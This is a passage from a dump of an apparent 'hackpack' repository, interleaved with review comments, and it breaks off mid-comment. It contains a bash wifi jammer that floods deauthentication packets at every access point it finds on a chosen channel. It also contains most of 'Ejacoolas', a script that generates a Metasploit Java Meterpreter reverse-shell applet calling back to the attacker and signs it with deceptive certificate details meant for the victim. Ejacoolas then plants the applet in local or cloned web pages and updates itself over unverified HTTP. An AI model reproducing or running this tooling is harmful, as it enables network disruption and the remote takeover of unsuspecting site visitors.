463 | http://www.youtube.com/watch?v=rLdQ3UhLoD4
464 |
465 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ddos/wifijammer_0.1.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # This is a bash based wifi jammer. It uses your wifi card
3 | # to continuously send de-authenticate packets to every client
4 | # on a specified channel... at least that's what it's supposed to do.
5 | # This program needs the Aircrack-ng suite to function
6 | # - and a wifi card that works with aircrack.
7 | # Checks if this file is being ran as root.
# The uid comes from `id -u` when `id` is found on PATH, otherwise from $UID.
# NOTE(review): the final test only refuses when USERID is non-empty and not 0,
# so if both lookups left USERID empty the script would carry on. The refusal
# path uses a bare `exit`, which reports the status of the preceding echo.
8 | if [ x"`which id 2> /dev/null`" != "x" ]
9 | then
10 | USERID="`id -u 2> /dev/null`"
11 | fi
12 | if [ x$USERID = "x" -a x$UID != "x" ]
13 | then
14 | USERID=$UID
15 | fi
16 | if [ x$USERID != "x" -a x$USERID != "x0" ]
17 | then
18 | #Guess not
19 | echo Run it as root ; exit ;
20 | fi
21 | # Changes working directory to the same as this file
# NOTE(review): $DIR is unquoted and the cd result is not checked. Every temp
# file and every `rm *.ext` below is relative, so if this cd fails they act on
# whatever directory the script was started from.
22 | DIR="$( cd "$( dirname "$0" )" && pwd )"
23 | cd $DIR
# Interface selection. $1, when given, is used as the interface name as is;
# otherwise the name is derived from `airmon-ng` output.
# Files touched in the current directory: clist01, clist (both removed again).
# NOTE(review): these are fixed file names written as root into the script's
# directory; mktemp would avoid clobbering or following a pre-existing path.
24 | # Sets first command line VAR
25 | WIFIVAR="$1"
26 | #Checks if user specified a WIFI card
27 | if [ x"$WIFIVAR" = x"" ]
28 | then
29 | echo "No wifi card specified, scanning for available cards (doesnt always work)"
30 | USWC="no"
31 | else
32 | echo "Using user specified wifi card ""$WIFIVAR"
33 | USWC="yes"
34 | fi
35 | if [ x"$USWC" = x"no" ]
36 | then
37 | # Uses Airmon-ng to scan for available wifi cards.
38 | airmon-ng|cut -b 1,2,3,4,5,6,7 > clist01
39 | count=0
40 | if [ -e "clist" ]; then
41 | rm clist
42 | fi
# The first four lines of the listing are skipped (count 0..3). For every later
# line the first 7 bytes, with all whitespace including the newline removed,
# are appended to clist, so the entries end up on one line with no separator.
# [:space:] is unquoted and therefore subject to globbing in this directory.
43 | cat clist01 |while read LINE ; do
44 | if [ $count -gt 3 ];then
45 | echo "$LINE" | cut -b 1-7 | tr -d [:space:] >>clist
46 | count=$((count+1))
47 | else
48 | count=$((count+1))
49 | fi
50 | done
51 | rm clist01
52 | WIFI=`cat clist`
53 | echo "Using first available Wifi card: `airmon-ng|grep "$WIFI"`"
54 | echo "If you would like to specify your own card please do so at the command line"
55 | echo "etc: sudo ./wifijammer_0.1 eth0"
56 | rm clist
57 | else
58 | WIFI="$WIFIVAR"
59 | fi
60 | #Check for a wifi card
61 | if [ x"$WIFI" = x"" ]; then
62 | #Guess no wifi card was detected
63 | echo "No wifi card detected. Quitting"
# Bare `exit`: the script reports the status of the echo above, i.e. success.
64 | exit
65 | fi
# Puts $WIFI into monitor mode via `airmon-ng start` and replaces $WIFI with
# the monitor interface name parsed from the saved output.
# Neither airmoncard nor testcommandvar02 is assigned earlier in this script,
# so both branches run unless the caller's environment already defines them.
# NOTE(review): the name is cut out by fixed byte offsets (30-40, then 1-5),
# which presumably matches one particular airmon-ng output layout; verify
# against the installed version. tempairmonoutput is a fixed file name in the
# current directory and $WIFI is passed unquoted.
66 | #Start the wireless interface in monitor mode
67 | if [ x"$airmoncard" != x"1" ]; then
68 | airmon-ng start $WIFI >tempairmonoutput
69 | airmoncard="1"
70 | fi
71 | #Looks for wifi card thats been set in Monitor mode
72 | if [ x"$testcommandvar02" = x"" ];then
73 | WIFI02=`cat tempairmonoutput|grep "monitor mode enabled on" |cut -b 30-40 | tr -d [:space:] |tr -d ")"`
74 | if [ x$WIFI02 = x ];then
75 | WIFI02=`cat tempairmonoutput|grep "monitor mode enabled" |cut -b 1-5 | tr -d [:space:]`
76 | fi
77 | WIFI="$WIFI02"
78 | rm tempairmonoutput
79 | fi
80 | echo "$WIFI"
# Channel prompt, optional 40 second airodump-ng preview, then the background
# capture that writes airodumpoutput*.csv for the loop below.
# NOTE(review): the answer is read without -r and is never checked to be
# numeric, yet it is spliced unquoted into the command string handed to
# `xterm -e`; restrict it to digits before use.
81 | # Asks user to specify a channel to jam, or to see a 40 second scan of the area
82 | read -p "Please specify a channel to jam, or type in 'scan' (without quotes) to see airodump's output for 40 seconds:" NUMBER
83 | # If something was entered that was not "scan" then assume its a number and continue
84 | if [ x"$NUMBER" != x"scan" ];then
85 | CHANNEL="$NUMBER"
86 | else
87 | # scan was entered, so start airodump-ng in channel hopping mode to scan the area
88 | airodump-ng $WIFI &
89 | SCANPID=$!
90 | sleep 40s
91 | kill $SCANPID
92 | sleep 1s
93 | # Asks user to specify a channel
94 | read -p "Please specify a channel to jam:" NUMBER
95 | CHANNEL="$NUMBER"
96 | fi
97 | # Launches airodump-ng on specified channel to start gathering a client list
# NOTE(review): the globs below delete every *.csv, *.cap and *.netxml in the
# current directory, not only files this script produced. *.kismet.csv is
# already covered by the first `rm *.csv`.
98 | rm *.csv
99 | xterm -fn fixed -geom -0-0 -title "Scanning specified channel" -e "airodump-ng -c $NUMBER -w airodumpoutput $WIFI" 2>/dev/null &
100 | # Removes temp files that are no longer needed
101 | rm *.cap 2>/dev/null
102 | rm *.kismet.csv 2>/dev/null
103 | rm *.netxml 2>/dev/null
104 | # Makes a folder that will be needed later
# stationlist/ holds one marker file per address already handled by the loop.
105 | mkdir stationlist 2>/dev/null
106 | rm stationlist/*.txt
# Main loop: `[ x1 ]` tests a non-empty string, so it never terminates by
# itself, and no trap is installed in the visible script. Whatever state exists
# when the script is interrupted (monitor-mode interface, xterm children,
# stationlist/, capture files) stays in place.
#
# Every 5 seconds the capture CSV is re-read. The first comma-separated field
# of each line, with whitespace removed, becomes $LINE. `start` is switched to
# "yes" after the line whose first field is "BSSID" and back to "no" at
# "StationMAC", so the addresses acted on are those listed in the BSSID
# section of the file. An address with no stationlist/<address>.txt marker gets
# its own xterm running aireplay-ng with `-a <address>`, and the marker is then
# created so that address is not started twice.
#
# The inner loop runs on the right-hand side of a pipe, so `start` and LINE
# exist only in that subshell and are re-initialised on each pass.
#
# NOTE(review): tempLINE01 is written and deleted without being read.
# $LINE01 and $LINE are used unquoted, and $LINE, which is text taken from the
# capture file, is spliced into the `xterm -e` command string and into a file
# path without validation.
#
# Context for defenders: the traffic this loop produces is unauthenticated
# 802.11 deauthentication frames; Protected Management Frames (802.11w) is the
# standard control for that frame class.
107 | # Start a loop so new clients can be added to the jamming list
108 | while [ x1 ];do
109 | sleep 5s
110 | # Takes appart the list of clients and reorganizes it in to something useful
111 | cat airodumpoutput*.csv|while read LINE01 ; do
112 | echo "$LINE01" > tempLINE01
113 | LINE=`echo $LINE01|cut -f 1 -d ,|tr -d [:space:]`
114 | rm tempLINE01
115 | # Ignores any blank
116 | if [ x"$LINE" != x"" ];then
117 | if [ x"$LINE" = x"StationMAC" ];then
118 | start="no"
119 | fi
120 | if [ x"$start" = x"yes" ];then
121 | if [ -e stationlist/"$LINE".txt ];then
122 | echo "" 2>/dev/null
123 | else
124 | # Lauches new window with de-authenticate thingy doing it's thing
125 | xterm -fn fixed -geom -0-0 -title "Jamming $LINE" -e "aireplay-ng --deauth 0 -a $LINE $WIFI" &
126 | echo "$LINE" > stationlist/$LINE.txt
127 | fi
128 | fi
129 | if [ x"$LINE" = x"BSSID" ];then
130 | start="yes"
131 | fi
132 | fi
133 | done
134 | done
135 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ejacoolas.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #SOME VARIABLES
# version is compared against the value fetched by the update check.
# defaultfolder / defaultfolder2 are the same directory with and without the
# trailing slash; both spellings are accepted at the save prompts.
4 | version="0.5"
5 | defaultfolder=/root/Ejacoolas/
6 | defaultfolder2=/root/Ejacoolas
# Takes the text after the first ':' on each ifconfig line containing
# "inet addr", skipping lines that match 127.0.0.1. With several matching
# interfaces $ip holds several lines.
# NOTE(review): this depends on the "inet addr:" output format; where ifconfig
# prints a different layout $ip is presumably empty, which createapplet handles
# by prompting.
7 | ip=`ifconfig | awk -F':' '/inet addr/&&!/127.0.0.1/{split($2,_," ");print _[1]}'`
8 |
9 | #CHANGELOG
10 | #v0.5
11 | #-Added the silent mode, for when you really need to do Splinter Cell
12 | #-Added some updating checks, no big deal
13 | #-Added the help option, but I'll not describe it within the help itself cause I'm a dick
14 | #-Added the import option, use it to import the applet that suites the situation
15 | #-Added the discard applet option in main menu
16 | #-Fixed some bugs in IP management
17 | #v0.42
18 | #-Added the template download and infection option
19 | #-Added a signal 2 trap for removing temp files
20 | #-Added some checks during the template download phase
21 | #-The bug fixing continues
22 | #v0.4
23 | #-Added the update feature, thanks to yamas (and Comax) for the great idea!
24 | #-Fixed some typos and bugs
25 | #v0.3 (thanks to Comax for his testing)
26 | #-Initial release, alpha version.
27 | #-Provides only basical features, but hey they work!
28 |
29 | #CLEANING FUNCTION
30 |
31 | trap quickcleanup 2
32 |
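#######################################
# Signal 2 (Ctrl+C) handler: announce the interrupt, remove the temporary
# build artifacts under /tmp, then exit.
# Globals:   appletname (read)
# Outputs:   one status line on stdout (leaves the terminal colour set to red)
# Returns:   does not return; exits with the status of the last rm
#######################################
quickcleanup() {
  echo -e "\n\033[1;31m[!] Caught Ctrl+C, removing temporary files...\n"
  # Every path is quoted: appletname can be derived from an imported file name,
  # and an unquoted value containing spaces or glob characters would make rm
  # act on paths other than the intended /tmp artifacts.
  rm -- "/tmp/$appletname.rc" 2>/dev/null
  rm -- "/tmp/$appletname.java" 2>/dev/null
  rm -- "/tmp/$appletname.class" 2>/dev/null
  rm -- /tmp/metasploit.dat 2>/dev/null
  rm -R -- /tmp/metasploit 2>/dev/null
  rm -R -- /tmp/META-INF 2>/dev/null
  rm -- /tmp/mykeystore 2>/dev/null
  rm -- "/tmp/$appletname.jar" 2>/dev/null
  rm -R -- /tmp/sitetmp 2>/dev/null
  rm -- "/tmp/$appletname.handler.sh" 2>/dev/null
  exit
}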
47 |
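#######################################
# Remove the temporary build artifacts under /tmp. Errors are silenced, so
# missing files are not reported.
# Globals:   appletname (read)
# Returns:   status of the last rm
#######################################
cleanup() {
  # Every path is quoted: appletname can be derived from an imported file name,
  # and an unquoted value containing spaces or glob characters would make rm
  # act on paths other than the intended /tmp artifacts.
  rm -- "/tmp/$appletname.rc" 2>/dev/null
  rm -- "/tmp/$appletname.java" 2>/dev/null
  rm -- "/tmp/$appletname.class" 2>/dev/null
  rm -- /tmp/metasploit.dat 2>/dev/null
  rm -R -- /tmp/metasploit 2>/dev/null
  rm -R -- /tmp/META-INF 2>/dev/null
  rm -- /tmp/mykeystore 2>/dev/null
  rm -- "/tmp/$appletname.jar" 2>/dev/null
  rm -R -- /tmp/sitetmp 2>/dev/null
  rm -- "/tmp/$appletname.handler.sh" 2>/dev/null
}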
60 |
61 | #MODES AND OPTIONS
62 |
# Help: -h / --help is recognised in any of the first five arguments, prints
# the usage text and exits (bare `exit`, so the status is that of the echo).
63 | if [[ $1 == "-h" || $2 == "-h" || $3 == "-h" || $1 == "--help" || $2 == "--help" || $3 == "--help" || $4 == "-h" || $4 == "--help" || $5 == "-h" || $5 == "--help" ]]; then
64 | echo -e "Ejacoolas v$version, by torpedo48
65 |
66 | Usage: $0
67 |
68 | Options:
69 | -h , --help I'm not describing this one, sorry...
70 |
71 | -s Activate Silent Mode (no Internet downloads)
72 |
73 | -i , Import an existing Evil Java Applet.
74 | --import No new applet will be generated.
75 |
76 |
77 |
78 | "
79 | exit
80 | fi
81 |
82 |
# Silent mode: -s is honoured only in the first three argument positions
# (help and import are checked in five). silentmode=1 is what the update check
# below tests before it contacts the network.
83 | if [[ $1 == "-s" || $2 == "-s" || $3 == "-s" ]]; then
84 | silentmode=1
85 | echo -e "\033[1;31m[!] Warning: your are running in Silent Mode. No data will be downloaded from the Internet...\n\n\n"
86 | sleep 3
87 | fi
88 |
89 | #UPDATING FUNCTION
# update: offers a self-update when $lastavailable sorts after $version.
# Globals:  lastavailable, version (read); userupdate (written)
# Input:    one line from stdin (y / n)
#
# NOTE(review), supply chain: the "y" branch downloads over plain HTTP straight
# onto $0, marks it executable and runs it. There is no TLS, checksum or
# signature, and the wget status is not checked before the chmod and re-exec,
# so whatever answers that request runs with the privileges of whoever
# launched this script. Fetch to a temporary file, verify it, then replace.
# NOTE(review): `>` inside [[ ]] compares strings, not version numbers, so
# "0.10" sorts before "0.5". $lastavailable comes from the network unmodified.
# NOTE(review): `[ $userupdate == "" ]` is unquoted; on an empty answer it
# becomes `[ == "" ]`, the test errors out, the default "y" is not applied and
# the `*)` arm re-prompts.
# The relaunch runs $0 without the original arguments, and the success message
# is printed by an echo without -e.
90 | update() {
91 | if [[ $lastavailable > $version ]]; then
92 | echo "A new version of Ejacoolas is available (v$lastavailable), do you want to update (recommended)? [y|n] (default: \"y\")"
93 | read userupdate
94 | if [ $userupdate == "" ]; then
95 | userupdate="y"
96 | fi
97 | case $userupdate in
98 | n) echo "You don't know what you're missing..."
99 | sleep 2;;
100 | y) wget -q http://torpedo48.it/ejacoolas/ejacoolas.sh -O $0
101 | chmod +x $0
102 | echo "Update was successfull! Launching the script...\n\n\n\n"
103 | sleep 2
104 | $0
105 | exit;;
106 | *) echo -e "Please insert just \"y\" or \"n\"...\n"
107 | update;;
108 | esac
109 | else echo -e "Your Ejacoolas is up-to-date, proceeding..."
110 | fi
111 | echo -e "\n\n\n\n"
112 | }
113 |
# Update check, skipped in silent mode. Fetches a small info file over plain
# HTTP, takes the line containing "version", strips the "version: " prefix and
# hands the result to update() through $lastavailable.
# NOTE(review): /tmp/info is a fixed name in a world-writable directory; a
# pre-created file or symlink at that path would be written through. Use
# mktemp. The fetched text is trusted as is and later shown in the prompt and
# used in the version comparison.
114 | if [ "$silentmode" != "1" ]; then
115 | echo "Checking if an update is available..."
116 | wget -q http://torpedo48.it/ejacoolas/info -O /tmp/info
117 | if [ "$?" != "0" ]; then
118 | echo -e "\033[0;31m[!] Error while downloading update information...\n\n"
119 | sleep 3
120 | else lastavailable=`cat /tmp/info | grep version`
121 | lastavailable=`echo ${lastavailable#"version: "}`
122 | rm /tmp/info
123 | update
124 | fi
125 | fi
126 |
127 | #GREETINGS
128 | echo -e "
129 | \033[1;31m#############################################################################\033[1;37m
130 | _____ _ _ ____ ___ ___ _ _ ____
131 | | ____| | | / \ / ___| / _ \ / _ \ | | / \ / ___|
132 | | _| _ | | / _ \ | | | | | | | | | | | | / _ \ \___ \
133 | | |___ | |_| | / ___ \ | |___ | |_| | | |_| | | |___ / ___ \ ___) |
134 | |_____| \___/ /_/ \_\ \____| \___/ \___/ |_____| /_/ \_\ |____/
135 |
136 | \033[1;31m#############################################################################
137 | \033[0;37m The Evil Java Applet COOL Automation Script
138 | brought to you by torpedo48
139 | http://torpedo48.it
140 | #############
141 | If you find a bug or have a suggestion, please
142 | contact me: admin@torpedo48.it
143 | ##################################################
144 | v$version
145 |
146 | "
147 |
# importapplet: registers an existing JAR instead of building one.
# Globals:  importfile, ip (read); appletname, imported, userport, port (written)
# Input:    one line from stdin (handler port, default 4448)
# Effects:  copies $importfile into /tmp/; exits the script when the file is
#           missing or its name does not end in .jar
# NOTE(review): $importfile is unquoted in the -f test, basename and cp, so a
# path containing spaces or glob characters is split or expanded. "Valid JAR"
# here means only that the name ends in .jar; the content is not inspected.
# The cp result is not checked before the success message.
148 | importapplet() {
149 | echo -e "\033[1;37m[...] Importing the specified file into Ejacoolas..."
150 | #importfilename=`basename $importfile | grep jar`
151 | if [ ! -f $importfile ]; then
152 | echo -e "\033[1;31m[!] Error: the specified file \"$importfile\" does not exist. Exiting...\n"
153 | sleep 3
154 | exit
155 | fi
156 | case $importfile in
157 | *.jar) appletname=`basename $importfile .jar`
158 | cp $importfile /tmp/ #add a check
159 | imported=1
160 | echo -e "\033[1;32m[->] Applet \"$appletname.jar\" successfully imported.
161 |
162 | \033[1;37mNote that the imported applet had been set with its own IP address and port to contact after the infection. You will not receive any session if your current IP (\"$ip\") is not the one set within the applet, or if your handler is not listening on the applet's port.
163 |
164 | Please enter the port used by the imported applet. As already said, if you enter a wrong port Ejacoolas' handler won't work. (default: \"4448\")"
165 | read userport
166 | if [ "$userport" == "" ]; then
167 | port=4448
168 | else port=$userport #add a check to reject non-numeric characters
169 | fi
170 | echo -e "\033[1;32m[->] Using port $port for the handler.\n";;
171 | *) echo -e "\033[1;31m[!] Error: the specified file \"$importfile\" is not a valid JAR file. Exiting...\n"
172 | sleep 3
173 | exit;;
174 | esac
175 | }
176 |
# Look for -i / --import in each of the first five arguments. The argument
# that follows the flag is taken as the JAR to import, and every match
# triggers an import, in positional order.
for _argpos in 1 2 3 4 5; do
  if [[ ${!_argpos} == "-i" || ${!_argpos} == "--import" ]]; then
    _argnext=$((_argpos + 1))
    importfile="${!_argnext}"
    importapplet
  fi
done
197 |
198 |
# createapplet: interactive build of the signed JAR.
# Input:    three lines from stdin (applet name, IP address, port), plus the
#           certificate fields that keytool asks for
# Globals:  appletname, ip, userip, userport, port, userexit (written)
# Calls:    cleanup() and then exits on any failed step
# Files created or unpacked while it runs, useful as host artifacts when
# triaging a machine: /tmp/<name>.rc, /tmp/<name>.jar, /tmp/<name>.java,
# /tmp/<name>.class, /tmp/metasploit.dat, /tmp/metasploit/, /tmp/META-INF/,
# /tmp/mykeystore.
# NOTE(review): all of these are fixed or user-derived names in /tmp, created
# without mktemp and referenced unquoted.
199 | createapplet() {
200 | #ASK FOR APPLET NAME
# Spaces and punctuation in the entered name are replaced by "_". The
# [:punct:] class is unquoted and therefore subject to globbing.
201 | echo -e "\033[1;37mPlease insert a name for the applet. Note that this will be shown to the victim when prompted to accept the applet itself. (default: Java_Applet)"
202 | read appletname
203 | if [ "$appletname" == "" ]; then
204 | appletname=Java_Applet
205 | else appletname=`echo "$appletname" | tr ' ' '_'`
206 | appletname=`echo "$appletname" | tr [:punct:] '_'`
207 | fi
208 | echo -e "\033[1;32m[->] \"$appletname\" will be used as applet name.\n"
209 |
210 | #ASK FOR PAYLOAD SETTINGS
# Same ifconfig parsing as at the top of the file; a typed address replaces
# the detected one. Neither the address nor the port is validated before being
# written into the resource file below.
211 | echo -e "\033[1;37m[...] Detecting local IP Address..."
212 | ip=`ifconfig | awk -F':' '/inet addr/&&!/127.0.0.1/{split($2,_," ");print _[1]}'`
213 | if [ "$ip" == "" ]; then
214 | echo -e "\033[1;31m[!] No IP Address found for this machine. Are you connected to a network?"
215 | echo -e "\033[1;37mPlease insert your IP Address:"
216 | read ip
217 | else echo -e "\033[1;37mIp Address $ip found for this machine. Press ENTER to use it, or specify the IP Address you want to use."
218 | read userip
219 | if [ "$userip" != "" ]; then
220 | ip=$userip
221 | fi
222 | fi
223 | echo -e "\033[1;32m[->] $ip will be used as local IP Address.\n"
224 |
225 | echo -e "\033[1;37mPlease insert the port you want to use for the payload (default: 4448):"
226 | read userport
227 | if [ "$userport" == "" ]; then
228 | port=4448
229 | else port=$userport #add a check to reject non-numeric characters
230 | fi
231 | echo -e "\033[1;32m[->] Using port $port for the payload.\n"
232 |
233 | #GENERATE THE PAYLOAD
# Writes a console resource file and runs it; success means exit status 0 and
# a non-empty /tmp/<name>.jar. The `cd /pentest/` result is not checked.
234 | echo -e "\033[1;37m[...] Generating the Java Meterpreter Reverse_tcp payload..."
235 | echo "use payload/java/meterpreter/reverse_tcp
236 | set LHOST $ip
237 | set LPORT $port
238 | generate -t jar -f /tmp/$appletname.jar
239 | exit" > /tmp/$appletname.rc
240 | cd /pentest/
241 | msfconsole -r /tmp/$appletname.rc 2>/dev/null
242 | if [[ "$?" != "0" || ! -s /tmp/$appletname.jar ]]; then
243 | echo -e "\033[1;31m[!] Error encountered while generating the payload, exiting..."
244 | cleanup
245 | read userexit
246 | exit
247 | else echo -e "\033[1;32m[->] Payload successfully generated.\n"
248 | rm /tmp/$appletname.rc
249 | fi
250 |
251 | #ADD THE CLASS FILE
# Writes a small Applet subclass named after the applet, unpacks the JAR into
# /tmp so the class can be compiled against it, then adds the compiled class
# back into the JAR. All later relative paths depend on the `cd /tmp/`.
252 | echo -e "\033[1;37m[...] Generating a launcher CLASS file for executing the payload within the applet..."
253 | echo "import java.applet.Applet;
254 | import metasploit.Payload;
255 |
256 | public class $appletname extends Applet
257 | {
258 |
259 | public $appletname()
260 | {
261 | }
262 |
263 | public void init()
264 | {
265 | try
266 | {
267 | Payload.main(null);
268 | }
269 | catch(Exception exception)
270 | {
271 | exception.printStackTrace();
272 | }
273 | }
274 | }
275 | " > /tmp/$appletname.java
276 | cd /tmp/
277 |
278 | jar -xf ./$appletname.jar
279 | if [ "$?" != "0" ]; then
280 | echo -e "\033[1;31m[!] Error encountered during the extraction of the previously generated Jar file, exiting..."
281 | cleanup
282 | read userexit
283 | exit
284 | fi
285 |
286 | javac -d /tmp/ -classpath /tmp/ /tmp/$appletname.java
287 | if [ "$?" != "0" ]; then
288 | echo -e "\033[1;31m[!] Error encountered while generating the launcher CLASS file, exiting..."
289 | cleanup
290 | read userexit
291 | exit
292 | fi
293 | rm /tmp/$appletname.java 2>/dev/null
294 |
295 | jar -uf ./$appletname.jar ./$appletname.class
296 | if [ "$?" != "0" ]; then
297 | echo -e "\033[1;31m[!] Error encountered while updating the previously generated jar file with the launcher CLASS file, exiting..."
298 | cleanup
299 | read userexit
300 | exit
301 | else echo -e "\033[1;32m[->] Jar file successfully updated with the launcher CLASS file.\n"
302 | rm /tmp/$appletname.class 2>/dev/null
303 | rm /tmp/metasploit.dat 2>/dev/null
304 | rm -R /tmp/metasploit 2>/dev/null
305 | rm -R /tmp/META-INF 2>/dev/null
306 | fi
307 |
308 | #SIGN THE JAR
# `keytool -genkey` creates a key pair with a self-signed certificate whose
# subject fields are whatever is typed at the prompts, so the signature on the
# resulting JAR says nothing about who published it. The key is throwaway: the
# alias is deleted and the keystore file removed once signing is done.
# NOTE(review): the keystore and key passwords are literals passed on the
# command line, where they are visible in the process list.
309 | echo -e "\033[1;37m[...] Generating the key and signing the Jar file..."
310 | echo -e "\033[1;37mPlease insert the required data for the Jar file when prompted. Those data will be visible to your victim, so insert something convincing.\n\033[0;37m"
311 |
312 | keytool -genkey -alias $appletname -keystore mykeystore -keypass mykeypass -storepass mystorepass
313 | if [ "$?" != "0" ]; then
314 | echo -e "\033[1;31m[!] Error encountered while generating the key, exiting..."
315 | cleanup
316 | read userexit
317 | exit
318 | fi
319 |
320 | jarsigner -keystore mykeystore -keypass mykeypass -storepass mystorepass /tmp/$appletname.jar $appletname
321 | if [ "$?" != "0" ]; then
322 | echo -e "\033[1;31m[!] Error encountered while signing the Jar file with the new key, exiting..."
323 | cleanup
324 | read userexit
325 | exit
326 | else echo -e "\033[1;32m[->] Evil Java Applet successfully generated!\n"
327 | fi
328 |
329 | keytool -delete -alias $appletname -keystore mykeystore -keypass mykeypass -storepass mystorepass
330 | if [ "$?" != "0" ]; then
331 | echo -e "\033[1;31m[!] Error encountered while deleting the used key. However, the applet will properly work: press ENTER to continue..."
332 | read userexit
333 | fi
334 | rm /tmp/mykeystore 2>/dev/null
335 | }
336 |
337 | #OUTPUT
338 |
# saveapplet: copies /tmp/<name>.jar into a folder chosen at the prompt.
# Input:    one line from stdin (folder, "back", or empty for the default)
# Globals:  defaultfolder, defaultfolder2, appletname (read);
#           outputfolder, appletsaved, usercontinue (written)
# Calls:    outputmenu (defined outside this excerpt); saveapplet recursively
# NOTE(review): "back" calls outputmenu without a following return, so if
# outputmenu ever returns, the rest of this function runs with outputfolder
# set to "back". $outputfolder is unquoted in the -d test and in cp. The
# fallback copy is not checked, and the success message is printed either way.
339 | saveapplet () {
340 | echo -e "\033[1;37m\nPlease specify the folder where you want to save the generated applet (default: $defaultfolder), or enter \"back\" to return to previous menu:"
341 | read outputfolder
342 | if [ "$outputfolder" == "back" ]; then
343 | outputmenu
344 | fi
345 | if [[ "$outputfolder" == "" || "$outputfolder" == "$defaultfolder2" ]]; then
346 | outputfolder=$defaultfolder
347 | fi
348 | if [ "$outputfolder" == "$defaultfolder" ]; then
349 | mkdir $defaultfolder 2>/dev/null
350 | fi
351 | if [ ! -d $outputfolder ]; then
352 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
353 | saveapplet
354 | else cp /tmp/$appletname.jar $outputfolder/
355 | if [[ "$?" != "0" || ! -s $outputfolder/$appletname.jar ]]; then
356 | echo -e "\033[1;31m[!] Error encountered while saving the Evil Java Applet to $outputfolder, saving it to $defaultfolder..."
357 | outputfolder=$defaultfolder
358 | mkdir $defaultfolder 2>/dev/null
359 | cp /tmp/$appletname.jar $outputfolder #ADD A FURTHER CHECK!!!
360 | fi
361 | echo -e "\033[1;32m[->] $appletname.jar successfully saved to $outputfolder!\n"
362 | appletsaved=1
363 | echo -e "\033[1;37mPress ENTER to return to the main menu...\n"
364 | read usercontinue
365 | outputmenu
366 | fi
367 | }
368 |
# Ask whether to try another URL after a failed clone.
# Reads one line from stdin; an empty answer counts as "y".
#   y -> clonesite, n -> outputmenu, anything else -> ask again.
cloneagain() {
  echo -e "\033[1;37mDo you want to try entering another URL? If not, you'll return to the main menu. [y|n] (default: \"y\")"
  read userinput3
  : "${userinput3:=y}"
  if [[ $userinput3 == n ]]; then
    outputmenu
  elif [[ $userinput3 == y ]]; then
    clonesite
  else
    echo -e "Please insert just \"y\" or \"n\"...\n"
    cloneagain
  fi
}
382 |
# outputpage: moves everything under /tmp/sitetmp/ into a folder chosen at the
# prompt, falling back to $defaultfolder when the move fails or the JAR or
# index.html is missing or empty afterwards.
# Input:    one line from stdin (folder, or empty for the default)
# Globals:  defaultfolder, defaultfolder2, appletname (read);
#           userpage, userexit, savepage (written)
# Calls:    outputmenu (defined outside this excerpt); outputpage recursively
# NOTE(review): $userpage is unquoted throughout. The fallback mv is not
# checked and the success message is printed regardless. As the prompt says,
# files with the same names in the target folder are overwritten.
383 | outputpage() {
384 | echo -e "\033[1;37m\nPlease specify the folder where you want to save the infected page and the Evil Java Applet. Existing files with the same names will be overwritten, so be careful! (default: $defaultfolder):"
385 | read userpage
386 | if [[ "$userpage" == "" || "$userpage" == "$defaultfolder2" ]]; then
387 | userpage=$defaultfolder
388 | fi
389 | if [ "$userpage" == "$defaultfolder" ]; then
390 | mkdir $defaultfolder 2>/dev/null
391 | fi
392 | if [ ! -d $userpage ]; then
393 | echo -e "\033[1;31m[!] The specified folder doesn't exist, please retry."
394 | outputpage
395 | else mv /tmp/sitetmp/* $userpage/
396 | if [[ "$?" != "0" || ! -s $userpage/$appletname.jar || ! -s $userpage/index.html ]]; then
397 | echo -e "\033[1;31m[!] Error encountered while saving the infected page and the Evil Java Applet to $userpage. Saving them to $defaultfolder..."
398 | userpage=$defaultfolder
399 | mkdir $defaultfolder 2>/dev/null
400 | mv /tmp/sitetmp/* $userpage/ #ADD A FURTHER CHECK!!!
401 | fi
402 | echo -e "\033[1;32m[->] The infected web page along with the Evil Java Applet were successfully moved to $userpage.\n"
403 | echo -e "\033[1;37mPress ENTER to return to the main menu..."
404 | read userexit
405 | savepage="1"
406 | outputmenu
407 | fi
408 | }
409 |
410 |
411 |
# infectpage: copies /tmp/<name>.jar next to the page in $pathtoindex and
# appends a string to $pathtoindex/index.html.
# Globals:  appletname, pathtoindex, localpage (read); userexit, savepage (written)
# Calls:    outputmenu, outputpage
# NOTE(review): in this listing the appended string is empty, and the fallback
# message that is meant to show the markup is blank as well; the markup was
# presumably lost when the page was extracted, so what the original appends
# cannot be confirmed from here.
# NOTE(review): the two error paths call outputmenu without returning, so if
# outputmenu ever returns, execution falls through to the $localpage test.
# $pathtoindex is used unquoted.
412 | infectpage() {
413 | echo -e "\033[1;37m[...] Attempting to infect the web page with the Evil Java Applet..."
414 | cp /tmp/$appletname.jar $pathtoindex/ 2>/dev/null
415 | if [[ "$?" != "0" || ! -s $pathtoindex/$appletname.jar ]]; then
416 | echo -e "\033[1;31m[!] Error encountered while copying $appletname.jar to $pathtoindex/, you'll have to manually infect the web page (actually in $pathtoindex)with the Evil Java Applet.\n"
417 | outputmenu
418 | else echo "" >> $pathtoindex/index.html
419 | if [ "$?" != "0" ]; then
420 | echo -e "\033[1;31m[!] Error encountered while adding some evil HTML code to $pathtoindex/index.html. You'll have to do that manually.
421 |
422 | \033[1;37mThis is the evil HTML code:
423 |
424 | \033[0;37m
425 |
426 | \033[1;37mAdd it to $pathtoindex/index.html and it will be infected with the Evil Java Applet. Remember to keep the infected index.html file and \"$appletname.jar\" always in the same folder (actually they're both in $pathtoindex/).\n"
427 | outputmenu
428 | else echo -e "\033[1;32m[->] Web page successfully infected!\n"
429 | fi
430 | fi
431 | if [ "$localpage" == "1" ]; then
432 | echo -e "\033[1;37mYou'll find the infected page (\"index.html\") along with the Evil Java Applet in $pathtoindex. Press ENTER to return to the main menu..."
433 | read userexit
434 | savepage="1"
435 | outputmenu
436 | else outputpage
437 | fi
438 | }
439 |
# clonesite: reads a URL from stdin, mirrors it with wget into /tmp/sitetmp and,
# when an index.html was produced there, sets pathtoindex=/tmp/sitetmp and hands
# over to infectpage. On failure it calls cloneagain.
# Globals written: cloneurl, pathtoindex. Files written: everything under /tmp/sitetmp.
#
# Review notes (what this leaves behind / what is observable):
# - Every request carries the same constant Referer (http://torpedo48.it) and the
#   same Firefox/2.0.0.6 User-Agent string, with robots.txt ignored and a 3 s
#   randomised wait. Those fixed header values are what the access log of the
#   cloned site would show for this function.
# - /tmp/sitetmp is a fixed name and the mkdir error is discarded, so a directory
